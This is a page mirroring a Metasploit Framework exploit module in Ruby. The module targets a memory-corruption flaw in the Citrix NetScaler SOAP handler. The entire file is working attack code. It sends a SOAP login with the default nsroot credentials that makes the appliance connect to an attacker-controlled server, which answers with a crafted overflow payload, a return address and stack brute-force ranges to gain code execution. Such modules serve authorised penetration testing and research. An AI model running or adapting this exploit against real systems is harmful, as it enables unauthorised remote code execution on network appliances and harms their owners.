Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
include Msf::Exploit::Remote::TcpServer
11
include Msf::Exploit::Brute
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Citrix NetScaler SOAP Handler Remote Code Execution',
18
'Description' => %q{
19
This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
20
The vulnerability exists in the SOAP handler, accessible through the web interface. A
21
malicious SOAP requests can force the handler to connect to a malicious NetScaler config
22
server. This malicious config server can send a specially crafted response in order to
23
trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
24
code with the privileges of the web server running the SOAP handler. This module has been
25
tested successfully on the NetScaler Virtual Appliance 450010.
26
},
27
'License' => MSF_LICENSE,
28
'Author' => [
29
'Bradley Austin', # Vulnerability Discovery and PoC
30
'juan vazquez' # Metasploit module
31
],
32
'References' => [
33
['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
34
],
35
'Payload' => {
36
'Space' => 1024,
37
'MinNops' => 512,
38
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
39
},
40
'Arch' => ARCH_X86,
41
'Platform' => 'bsd',
42
'Stance' => Msf::Exploit::Stance::Aggressive,
43
'Targets' => [
44
[
45
'NetScaler Virtual Appliance 450010',
46
{
47
'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
48
'Offset' => 606,
49
'Ret' => 0xffffda94, # Try before bruteforce...
50
# The virtual appliance lacks of security mitigations like DEP/ASLR, since the
51
# process being exploited is an apache child, the bruteforce attack works fine
52
# here.
53
'Bruteforce' =>
54
{
55
'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
56
'Stop' => { 'Ret' => 0xfffdf000 }, # top of the stack
57
'Step' => 256
58
}
59
}
60
],
61
],
62
'DisclosureDate' => '2014-09-22',
63
'DefaultTarget' => 0,
64
'Notes' => {
65
'Stability' => [ CRASH_SAFE, ],
66
'Reliability' => [ REPEATABLE_SESSION, ],
67
'SideEffects' => [ IOC_IN_LOGS, ]
68
}
69
)
70
)
71
72
register_options(
73
[
74
OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
75
OptAddress.new('SRVHOST', [true, 'The local host to listen on. This must be an address on the local machine reachable by the target', ]),
76
OptPort.new('SRVPORT', [true, 'The local port to listen on.', 3010])
77
]
78
)
79
end
80
81
def check
82
res = send_request_cgi({
83
'method' => 'GET',
84
'uri' => normalize_uri(target_uri.path)
85
})
86
87
if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m
88
return Exploit::CheckCode::Detected
89
end
90
91
Exploit::CheckCode::Unknown
92
end
93
94
def exploit
95
if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])
96
fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')
97
end
98
99
if check != Exploit::CheckCode::Detected
100
fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
101
end
102
103
start_service
104
105
if target.ret
106
@curr_ret = target.ret
107
send_request_soap
108
Rex.sleep(3)
109
110
if session_created?
111
return
112
end
113
end
114
115
super
116
end
117
118
def brute_exploit(addrs)
119
@curr_ret = addrs['Ret']
120
send_request_soap
121
end
122
123
def send_request_soap
124
soap = <<~EOS
125
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
126
<SOAP-ENV:Body>
127
<ns7744:login xmlns:ns7744="urn:NSConfig">
128
<username xsi:type="xsd:string">nsroot</username>
129
<password xsi:type="xsd:string">nsroot</password>
130
<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
131
<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
132
<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
133
</ns7744:login>
134
</SOAP-ENV:Body>
135
</SOAP-ENV:Envelope>
136
EOS
137
138
print_status('Sending soap request...')
139
140
send_request_cgi({
141
'method' => 'POST',
142
'uri' => normalize_uri(target_uri.path),
143
'data' => soap
144
}, 1)
145
end
146
147
def on_client_data(cli)
148
print_status("#{cli.peerhost} - Getting request...")
149
150
data = cli.get_once(2)
151
req_length = data.unpack('v')[0]
152
153
req_data = cli.get_once(req_length - 2)
154
unless req_data.unpack('V')[0] == 0xa5a50000
155
print_error("#{cli.peerhost} - Incorrect request... sending payload anyway")
156
end
157
158
print_status("#{cli.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")
159
160
my_payload = Rex::Text.pattern_create(target['Offset'])
161
my_payload << [@curr_ret, target['RwPtr']].pack('V*')
162
my_payload << payload.encoded
163
164
pkt = [my_payload.length + 6].pack('v')
165
pkt << "\x00\x00\xa5\xa5"
166
pkt << my_payload
167
cli.put(pkt)
168
cli.disconnect
169
end
170
end
171
172